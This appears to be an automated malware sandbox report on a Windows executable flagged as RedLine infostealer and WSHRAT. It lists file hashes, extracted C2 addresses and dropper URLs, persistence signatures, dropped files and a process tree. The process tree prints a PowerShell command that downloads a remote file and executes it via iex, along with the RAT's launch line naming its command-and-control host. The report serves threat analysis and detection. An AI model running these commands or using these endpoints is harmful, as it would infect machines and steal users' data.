Overview

overview

10

Static

static

1

F82E5E6BA6...DD.exe

windows7-x64

10

F82E5E6BA6...DD.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    151s
  • max time network
    168s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    20/10/2022, 08:11

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    F82E5E6BA614031D24CB1460149E658EB3B4B9B0372DD.exe

  • Size

    4.1MB

  • MD5

    803238fd75925bebb2d385b7c472b8f7

  • SHA1

    0f06400fd1e6e0003e90e6e289ef53b968ddb6dd

  • SHA256

    f82e5e6ba614031d24cb1460149e658eb3b4b9b0372dda40989ea413feae185c

  • SHA512

    ceab74a27e52e29574a14b0ca0e66cb2fae8a6e0d6bb7a8f89aa7a66d5a918ba23bf3ae73cc1e5c00bb8c031ad6465208b6d3d40c07df882a681de7b46c692f9

  • SSDEEP

    98304:vFEn+sPuptl3GCXOStfnCKWdZkkby1/++UIAr:vREupr/XO+CDdZPby1/ZUIe

Score
10/10
redlinewshratinfostealerpersistencetrojan

Malware Config

Extracted

Family

redline

C2

45.87.155.189:20856

Attributes
  • auth_value

    ac64e5ead391346e804f0d9ec2f18faa

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://files.catbox.moe/3pwn9k.jpg

Extracted

Family

wshrat

C2

http://svchost.ydns.eu:8000

Signatures

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    infostealerredline
  • RedLine payload 1 IoCs
  • WSHRAT

    WSHRAT is a variant of Houdini worm and has vbs and js variants.

    trojanwshrat
  • Blocklisted process makes network request 7 IoCs
  • Executes dropped EXE 3 IoCs
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 4 IoCs
  • Adds Run key to start application 2 TTPs 8 IoCs
    persistence
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 12 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Kills process with taskkill 1 IoCs
    evasion
  • Modifies registry class 1 IoCs
  • Script User-Agent 2 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 35 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\F82E5E6BA614031D24CB1460149E658EB3B4B9B0372DD.exe
    "C:\Users\Admin\AppData\Local\Temp\F82E5E6BA614031D24CB1460149E658EB3B4B9B0372DD.exe"
    1⤵
    • Checks computer location settings
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:4912
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\EsetNod32.js"
      2⤵
      • Blocklisted process makes network request
      • Checks computer location settings
      • Drops startup file
      • Adds Run key to start application
      • Suspicious use of WriteProcessMemory
      PID:1264
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /c taskkill /F /IM kl-plugin.exe
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3624
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM kl-plugin.exe
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4668
      • C:\Users\Admin\AppData\Roaming\kl-plugin.exe
        "C:\Users\Admin\AppData\Roaming\kl-plugin.exe" svchost.ydns.eu 8000 "WSHRAT|94D95F5C|GBQHURCC|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 20/10/2022|JavaScript-v2.0|NL:Netherlands" 1
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetWindowsHookEx
        PID:2376
    • C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe
      "C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar "C:\Users\Admin\AppData\Roaming\Java Plataform.jar"
      2⤵
      • Drops file in Program Files directory
      PID:2716
    • C:\Users\Admin\AppData\Roaming\Scr.exe
      "C:\Users\Admin\AppData\Roaming\Scr.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:4436
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" -c cd $env:tmp;Invoke-WebRequest https://files.catbox.moe/9jfjbh.png -OutFile Error.png;gc Error.png | iex
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:100
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Scr.VBS"
      2⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:4452
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\ProgramData\rrrrrrrr.ps1"
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2120
    • C:\Users\Admin\AppData\Roaming\ONLYFANS CHECKER.exe
      "C:\Users\Admin\AppData\Roaming\ONLYFANS CHECKER.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • Suspicious use of WriteProcessMemory
      PID:4264
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        3⤵
          PID:1568
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\User.vbs"
        2⤵
        • Blocklisted process makes network request
        • Drops startup file
        • Adds Run key to start application
        PID:2760

    Network

          MITRE ATT&CK Enterprise v6

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\ProgramData\rrrrrrrr.ps1
            Filesize

            437B

            MD5

            6fb3bcb1df4238202635b791907a2cc8

            SHA1

            e34888df4096c91096fc76599b8586a513feca7f

            SHA256

            8a92dfc83aa949a737624fb844dbcf0731b7cfa5bfb8e70a105f2a2b532cc06c

            SHA512

            2fbc0f082e542082a4dc54d72f922fe33ff50ed549874c4b82399321546a9485b1852e225d3272e0581fec8b6d8a2f7506db2cdb196ba465a878eca396782277

            Download Submit

          • C:\Users\Admin\AppData\Roaming\EsetNod32.js
            Filesize

            712KB

            MD5

            3624e469765d60dfb5ef46d96504038a

            SHA1

            a42a61dc4d169e4b555702a8a45e8a49fbe11beb

            SHA256

            4cd6701682cc75c9581d720ff4f87db4bd1a4ec8bb6775bfe0fd2d66ebeb3465

            SHA512

            b196618a732d840619dcc0ac45a9b7205f7ff21cdb87c18bafdb9ae28bf8d5c06b1049f9227851588897ba24e6e3922a922aa291ef6d62323ee6121019ad6fa6

            Download Submit

          • C:\Users\Admin\AppData\Roaming\Java Plataform.jar
            Filesize

            92KB

            MD5

            0bdc00b168aca259ac2cb22226673b51

            SHA1

            1fbe9e133cda80479ac441b77891c9049e6e43c1

            SHA256

            edc82523e7ff486f9b1ce56a27dfe724262578748a60fc94305cbc158db176c3

            SHA512

            26d1ed2bdfe26ba44466874ebf334213a5cb2c07a7f68cdb5dfbfb092f7960c4812e223bfe53daf8ac06b34b78ac6d3d11e80c51377b6f237fbe8125ad92a104

            Download Submit

          • C:\Users\Admin\AppData\Roaming\ONLYFANS CHECKER.exe
            Filesize

            3.9MB

            MD5

            6b62d1351a2513db98027b4ee9440a31

            SHA1

            7678ad8679e82c99ea35166027bb595ec8244c9e

            SHA256

            76e957be45c916f66c7cbaad91a73b44639e21141baf5d958907925beb91129b

            SHA512

            efb470ebdb522efdbd8b67404c81fd857e27d952bcef2c3e0d6f1dd336a8e58932a7f1083844523232d636e2b21875a4a2ba2248839f67d6c1561e4858509638

            Download Submit

          • C:\Users\Admin\AppData\Roaming\ONLYFANS CHECKER.exe
            Filesize

            3.9MB

            MD5

            6b62d1351a2513db98027b4ee9440a31

            SHA1

            7678ad8679e82c99ea35166027bb595ec8244c9e

            SHA256

            76e957be45c916f66c7cbaad91a73b44639e21141baf5d958907925beb91129b

            SHA512

            efb470ebdb522efdbd8b67404c81fd857e27d952bcef2c3e0d6f1dd336a8e58932a7f1083844523232d636e2b21875a4a2ba2248839f67d6c1561e4858509638

            Download Submit

          • C:\Users\Admin\AppData\Roaming\Scr.VBS
            Filesize

            984B

            MD5

            986066708bacb494aade46fbfbe000fe

            SHA1

            665c06147c57d72eb6d1f2f38c6be141eb17c47e

            SHA256

            c581c944bf383522f361ed5695fbc9bf46476145e894c244a2fe830e8757a15f

            SHA512

            8ab3f43c93350642cb5b2d78e2d1f848933facd5f72f2a105b675858e72b9547291c1c5448433927f1ee859de245a9891dafbfc2de641bbacaf9e1a7b3ccc7e3

            Download Submit

          • C:\Users\Admin\AppData\Roaming\Scr.exe
            Filesize

            4KB

            MD5

            6f8e34106a2a024f6961b5e166dfb57b

            SHA1

            183cecc7f4f29304474eb629c215fe23280b4611

            SHA256

            06d48205d2491502fd82e050c880213a29039ee8c4dba7be9f84f19147d4ee66

            SHA512

            7b130286d62858c1c0e4908a8149cb9d5f47947d604b3bbdef42d6b34f6ce976bd431d80cde9a097b6a4a5f79e7971c287ca8428ab08d2e23448c91d652e0245

            Download Submit

          • C:\Users\Admin\AppData\Roaming\Scr.exe
            Filesize

            4KB

            MD5

            6f8e34106a2a024f6961b5e166dfb57b

            SHA1

            183cecc7f4f29304474eb629c215fe23280b4611

            SHA256

            06d48205d2491502fd82e050c880213a29039ee8c4dba7be9f84f19147d4ee66

            SHA512

            7b130286d62858c1c0e4908a8149cb9d5f47947d604b3bbdef42d6b34f6ce976bd431d80cde9a097b6a4a5f79e7971c287ca8428ab08d2e23448c91d652e0245

            Download Submit

          • C:\Users\Admin\AppData\Roaming\User.vbs
            Filesize

            1.4MB

            MD5

            195176fece927e0f49c61aaeec356b5b

            SHA1

            5471ae64215ffdc266ae886bbace3b822655c339

            SHA256

            64399996339c31666bfd04dcaa039e509954f019f55279e4512e16626e693d1b

            SHA512

            73e6e383828cc9af57cc7a634b6d04c5ce720d54f64229fec1b4152c124164b2c901b7735de054069518d5faf5cd000f1dfd125412b2e41dce8540508ac84832

            Download Submit

          • C:\Users\Admin\AppData\Roaming\kl-plugin.exe
            Filesize

            25KB

            MD5

            7099a939fa30d939ccceb2f0597b19ed

            SHA1

            37b644ef5722709cd9024a372db4590916381976

            SHA256

            272e64291748fa8be01109faa46c0ea919bf4baf4924177ea6ac2ee0574f1c1a

            SHA512

            6e179a32b3091beee71d425248ae56495e31e9df569159a93af5826ddef28fba904ae4810d3ca2da45fe6dc8be1eeaecf71e8225b3e605f22f41f4e46d1cf721

            Download Submit

          • C:\Users\Admin\AppData\Roaming\kl-plugin.exe
            Filesize

            25KB

            MD5

            7099a939fa30d939ccceb2f0597b19ed

            SHA1

            37b644ef5722709cd9024a372db4590916381976

            SHA256

            272e64291748fa8be01109faa46c0ea919bf4baf4924177ea6ac2ee0574f1c1a

            SHA512

            6e179a32b3091beee71d425248ae56495e31e9df569159a93af5826ddef28fba904ae4810d3ca2da45fe6dc8be1eeaecf71e8225b3e605f22f41f4e46d1cf721

            Download Submit

          • memory/100-172-0x00007FFCC3EF0000-0x00007FFCC49B1000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/100-147-0x000001A226680000-0x000001A2266A2000-memory.dmp

            Filesize

            136KB

            Download

          • memory/100-194-0x00007FFCC3EF0000-0x00007FFCC49B1000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/100-151-0x00007FFCC3EF0000-0x00007FFCC49B1000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/1568-192-0x00000000048F0000-0x000000000492C000-memory.dmp

            Filesize

            240KB

            Download

          • memory/1568-190-0x00000000049C0000-0x0000000004ACA000-memory.dmp

            Filesize

            1.0MB

            Download

          • memory/1568-188-0x0000000004E00000-0x0000000005418000-memory.dmp

            Filesize

            6.1MB

            Download

          • memory/1568-176-0x0000000000400000-0x0000000000420000-memory.dmp

            Filesize

            128KB

            Download

          • memory/1568-189-0x0000000004890000-0x00000000048A2000-memory.dmp

            Filesize

            72KB

            Download

          • memory/2120-198-0x0000000005C60000-0x0000000005C7A000-memory.dmp

            Filesize

            104KB

            Download

          • memory/2120-191-0x0000000005B60000-0x0000000005B7E000-memory.dmp

            Filesize

            120KB

            Download

          • memory/2120-197-0x00000000072A0000-0x000000000791A000-memory.dmp

            Filesize

            6.5MB

            Download

          • memory/2120-187-0x00000000054D0000-0x0000000005536000-memory.dmp

            Filesize

            408KB

            Download

          • memory/2120-182-0x0000000002220000-0x0000000002256000-memory.dmp

            Filesize

            216KB

            Download

          • memory/2120-183-0x0000000004C90000-0x00000000052B8000-memory.dmp

            Filesize

            6.2MB

            Download

          • memory/2120-185-0x00000000052C0000-0x00000000052E2000-memory.dmp

            Filesize

            136KB

            Download

          • memory/2120-186-0x0000000005460000-0x00000000054C6000-memory.dmp

            Filesize

            408KB

            Download

          • memory/2376-202-0x000000006C2A0000-0x000000006C851000-memory.dmp

            Filesize

            5.7MB

            Download

          • memory/2716-174-0x00000000032F0000-0x00000000042F0000-memory.dmp

            Filesize

            16.0MB

            Download

          • memory/2716-164-0x00000000032F0000-0x00000000042F0000-memory.dmp

            Filesize

            16.0MB

            Download

          • memory/4264-173-0x0000000000400000-0x0000000000A18000-memory.dmp

            Filesize

            6.1MB

            Download

          • memory/4264-153-0x0000000000400000-0x0000000000A18000-memory.dmp

            Filesize

            6.1MB

            Download

          • memory/4264-156-0x0000000000400000-0x0000000000A18000-memory.dmp

            Filesize

            6.1MB

            Download

          • memory/4264-181-0x0000000000400000-0x0000000000A18000-memory.dmp

            Filesize

            6.1MB

            Download

          • memory/4264-171-0x0000000002590000-0x00000000025F0000-memory.dmp

            Filesize

            384KB

            Download

          • memory/4264-166-0x0000000000400000-0x0000000000A18000-memory.dmp

            Filesize

            6.1MB

            Download

          • memory/4436-139-0x0000000000730000-0x0000000000738000-memory.dmp

            Filesize

            32KB

            Download

          • memory/4436-152-0x00007FFCC3EF0000-0x00007FFCC49B1000-memory.dmp

            Filesize

            10.8MB

            Download